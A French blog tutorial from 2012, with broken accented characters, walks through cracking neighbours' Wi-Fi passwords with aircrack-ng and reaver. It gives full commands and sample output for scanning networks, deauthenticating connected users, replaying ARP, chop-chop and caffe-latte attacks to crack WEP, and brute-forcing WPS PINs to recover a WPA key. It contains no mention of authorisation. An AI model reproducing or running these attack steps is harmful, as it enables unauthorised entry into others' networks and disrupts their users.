Fév 142012
 

Pr?-requis :

Avoir une distribution Debian ou Ubuntu. Ces distributions ne sont pas meilleures pour le crack que les autres, mais mon tutoriel est bas? uniquement sur cette distribution.
Les commandes fonctionnent parfaitement sur d?autres distributions. La seule diff?rence, est la mani?re d?installer les d?pendances.

Droits d?acc?s

Pour la grande majorit? des commandes, vous devez ?tre ROOT pour que cela fonctionne.

Vous pouvez le devenir en tapant la commande ? su ? ? et en entrant le mot de passe de ? root ?

Installer la suite aircrack-ng (et ses d?pendances)

apt-get install libssl-dev make gcc iw

wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1
make
make install

Avoir une carte wifi compatible (Realtek, RALink,…) Evitez les cartes Intel…

Tapez la commande ?iwconfig? et regardez le mat?riel Wifi install?.

root@linux-hack:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11bg  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=27 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
pan0      no wireless extensions.

Dans ce cas-ci, on voit que l?interface r?seau WLAN0 est une carte WIFI.

Comment v?rifier si elle est capable de passer en mode ? monitor ?

root@linux-hack:~# airmon-ng start wlan0
 Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e

PID    Name
1211   NetworkManager
1220   avahi-daemon
1223   avahi-daemon
2298   wpa_supplicant
2300   dhclient

Interface      Chipset        Driver
wlan0          RTL8187        rtl8187 - [phy0]
                              (monitor mode enabled on mon0)

Nous voyons que la carte WLAN0 est pass?e en mode monitor via la nouvelle interface r?seau ? MON0 ?

Scannez les r?seaux Wifi environnants pour trouver votre cible

airodump-ng mon0

Cette commande va vous donner la liste de tout ce qu?il trouve

CH  5 ][ Elapsed: 24 s ][ 2012-02-14 09:32

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 11:22:33:44:55:66  -36       39       30    0   9  54e. WPA  TKIP   PSK  bbox2-1234
 11:22:33:44:55:66  -35       41        0    0   9  54e. OPN              bbox2-1234
 11:22:33:44:55:66  -49       19        1    0   1  54e. OPN              bbox2-1234
 11:22:33:44:55:66  -66       14        0    0   6  54e  WPA2 CCMP   PSK  bbox2-1234
 11:22:33:44:55:66  -65       15        1    0   6  54e. WPA2 CCMP   PSK  bbox2-1234
 11:22:33:44:55:66  -67        7        0    0   1  54e. OPN              bbox2-1234
 11:22:33:44:55:66  -67       19        0    0   9  54 . WEP  WEP         bbox2-1234
 11:22:33:44:55:66  -68        5        1    0   1  54e. WPA  TKIP   PSK  bbox2-1234
 11:22:33:44:55:66  -70        4        0    0   1  54e  WPA2 CCMP   PSK  bbox2-1234
 11:22:33:44:55:66  -71        4        0    0  11  54e. WPA  TKIP   PSK  bbox2-1234
 11:22:33:44:55:66  -72        2        0    0   1  54e. WEP  WEP         bbox2-1234

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 (not associated)   11:22:33:44:55:66  -72    0 - 1      0        2  bbox2-9999
 11:22:33:44:55:66  11:22:33:44:55:66   -9   54e-54      0        4
 11:22:33:44:55:66  11:22:33:44:55:66  -56    1e- 5      0        2

BSSID = adresse MAC de l’appareil
ESSID = nom d WIFI
STATION = Adresse MAC d’un appareil wifi connect? (pc, GSM, …)
PWR = perte de signal entre vous et la station (-40 = bien. -70 = mauvais signal)
CH = canal de communication (fr?quence)
ENC = Cryptage mis en place.

J?ai volontairement masqu? les adresses MAC et les noms des WIFI pour des raisons de s?curit?

Cracker le mot de passe d?un r?seau Wifi

Cracker un reseau OPN

Y’a pas besoin, il n’y a aucun cryptage

Cracker un r?seau WEP

Dans la suite, je vous pr?senterai plusieurs commandes. Celles-ci sont a lancer en simultan?. Ouvrez donc une fen?tre de terminal diff?rente ? chaque attaque/commande

1? Lancer airodump en mode « enregistrement des donn?es » sur la cible.

Voici les d?tails de ma cible :

BSSID                PWR  Beacons  #Data, #/s  CH    MB     ENC    CIPHER    AUTH ESSID
 11:22:33:44:55:66    -68  5        0      0    1     54e.   WEP    WEP            bbox2-1234
airodump-ng -w BIBOX --ivs -c 1 -d 11:22:33:44:55:66 mon0

Cette commande demande :

– D’?crire dans un fichier commen?ant par BIBOX
– N’?crire que les donn?es utiles pour le crack (les IVS)
– De se caler sur le canal 1 (-c 1)
– De ne filtrer que sur l’Access Point qui nous int?resse sur base de son adresse MAC (-d MAC )
– Le tout, via l’interface r?seau « mon0 »

Cette commande ne devra ?tre arr?t?e QUE quand on aura finalement crack? l’AccessPoint.

2? Ejecter tous les gens connect?s dessus afin de les forcer ? se reconnecter.

aireplay-ng -0 0 -a 11:22:33:44:55:66 mon0

-0 0 : attaque 0 ex?cut?e ind?finiment (0)
-a MAC : adresse mac de la machine que j’attaque

Arr?ter la commande apr?s un certain temps. Vous pourrez la relancer plusieurs fois si vous voulez, mais n?oubliez pas de vous r?-authentifier apr?s (point suivant)

3? S’authentifier sur le WIFI (faire croire qu’on est copains)

aireplay-ng -1 0 -e 11:22:33:44:55:66 mon0

-1 0 : attaque 1 ex?cut?e sans arr?t (0)
-e MAC : adresse mac de la machine que j’attaque

4? Faire une attaque ? ARP ?

aireplay-ng -3  -e 11:22:33:44:55:66 mon0

Cette attaque est TRES ?fficace quand quelqu?un est d?j? connect? sur le wifi.
Il vaut mieux la laisser tourner. D?s qu?elle d?marre, elle est redoutable !

5? Faire une attaque ? chop-chop ?

aireplay-ng -4  -e 11:22:33:44:55:66 mon0

6? Faire une attaque ? cofee-latte ?

aireplay-ng -6  -e 11:22:33:44:55:66 mon0

Cette attaque est efficace si quelqu?un est d?j? connect? sur le WIFI

7? cracker la clef.

C?est bien beau de sauver les IVS, de faire des attaques, de g?n?rer du traffic et tout et tout, mais on voulait quoi d?j? ? Ah oui ! cette foutue clef !

aircrack-ng *.ivs

Laissez tourner?

D?s que la clef sera trouv?e, vous pourrez arr?ter toutes les attaques ci-dessus.

Cracker du WPA

Pr?-requis :

Installer les programmes n?cessaires ainsi que leurs d?pendances

apt-get install libsqlite3-dev libpcap0.8-dev

 wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
 tar -zxf reaver-1.4.tar.gz
 cd reaver-1.4
 cd src
 ./configure
 make
 make install

Connaitre sa cible.

Voir point ci-dessus : Scannez les r?seaux Wifi environnants pour trouver votre cible

Attaquer le point WIFI

reaver -i mon0 -b 11:22:33:44:55:66

ou, si ca ne fonctionne pas (comme chez moi)

reaver -L -d 0 -i mon0 -b 11:22:33:44:55:66

La syntaxe est simple : lancer reaver sur l?interface wifi qui-va-bien avec comme param?tre l?adresse MAC du wifi cible (BSSID) (vous pouvez ajouter l?option ? ?vv ? pour le voir travailler)

Le r?sultat apparait comme par enchantement !

root@linux-hack:~# reaver -L -d 0 -i mon0 -b 11:22:33:44:55:66 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 

[+] Waiting for beacon from 11:22:33:44:55:66[+] Switching mon0 to channel 1
[+] Associated with 11:22:33:44:55:66 (ESSID: bbox2-1234)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 12 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'Ceciestuntutoriel'
[+] AP SSID: 'bbox2-1234'
[+] Nothing done, nothing to save.
root@linux-hack:~#

Et voil?. 12 secondes pour du WPA. Le mot de passe apparait : ‘Ceciestuntutoriel’

Si vous voulez connaitre le vendeur d’une carte r?seau : http://www.base64online.com/mac_address.php